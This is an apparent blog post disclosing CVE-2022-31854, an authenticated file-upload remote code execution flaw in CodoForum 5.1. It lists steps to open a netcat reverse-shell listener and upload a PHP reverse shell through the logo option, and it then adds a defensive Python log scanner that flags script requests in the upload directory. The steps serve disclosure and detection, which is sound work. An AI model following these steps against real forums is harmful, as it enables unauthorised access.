CodoForum V5.1 authenticated RCE | My first CVE

Vikaran
Jul 5, 2022

This article is going to be about how I found my first CVE (Common Vulnerabilities and Exposures)/zero-day vulnerability.

Vulnerable Application and CVE details

Name: CodoForum
Version: 5.1
Vendor: CodoLogic
CVE ID: CVE-2022-31854
Vulnerability type: Authenticated Remote Code Execution via File Upload

Exploit

1. Start a NetCat reverse shell on the attacker machine

    nc -lvnp 9999

2. Login to the admin panel

3. Go to the ‘Global Settings’ pane

4. Edit the IP and port number in the reverse shell file

5. Upload the reverse shell from the logo upload option

6. Once uploaded, access the file from the path http://[codoforum site]/sites/default/assets/img/attachments/[file].php

7. Go to the path and get shell access from the NetCat connection established earlier

PWNED!

Exploit code:

Unlisted
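
For defenders, the steps above leave a clear trace: a request for a script file inside the attachments directory, which should only ever serve images. The following is an added example, not code from this article or from CodoForum, that flags such requests in a web access log; the combined log format, the extension list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Upload directory named in the write-up; only images are expected here.
UPLOAD_DIR = "/sites/default/assets/img/attachments/"
# Assumption: extensions a PHP handler mapping may execute (also .php/x and .php.jpg).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(?=$|[./])", re.IGNORECASE)
# Assumption: common/combined log format.
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                  r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log lines (documentation IP ranges, invented file names).
SAMPLE = [
    '198.51.100.7 - - [05/Jul/2022:10:01:02 +0000] '
    '"GET /sites/default/assets/img/attachments/logo.png HTTP/1.1" 200 5120',
    '198.51.100.7 - - [05/Jul/2022:10:03:40 +0000] '
    '"GET /sites/default/assets/img/attachments/upload.php HTTP/1.1" 200 0',
    '203.0.113.9 - - [05/Jul/2022:10:04:11 +0000] '
    '"GET /sites/default/assets/img/attachments/a%2EPHP?x=1 HTTP/1.1" 404 196',
    '203.0.113.9 - - [05/Jul/2022:10:05:00 +0000] '
    '"GET /index.php?u=/page/6 HTTP/1.1" 200 900',
]

def suspicious_hits(lines):
    """Return (ip, timestamp, path, status) for script requests in the upload dir."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        # Drop the query string, then decode %xx so an encoded dot is still seen.
        path = unquote(urlsplit(m["target"]).path)
        if not path.lower().startswith(UPLOAD_DIR):
            continue
        # Only the part below the upload directory is checked for script extensions.
        if SCRIPT_EXT.search(path[len(UPLOAD_DIR):]):
            hits.append((m["ip"], m["ts"], path, int(m["status"])))
    return hits

if __name__ == "__main__":
    for hit in suspicious_hits(SAMPLE):
        print(hit)
```

A hit with status 200 means the server served or executed a script from a directory meant for images and deserves immediate review. Disabling script execution for that directory in the web server configuration means the forum does not have to rely on detection alone.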
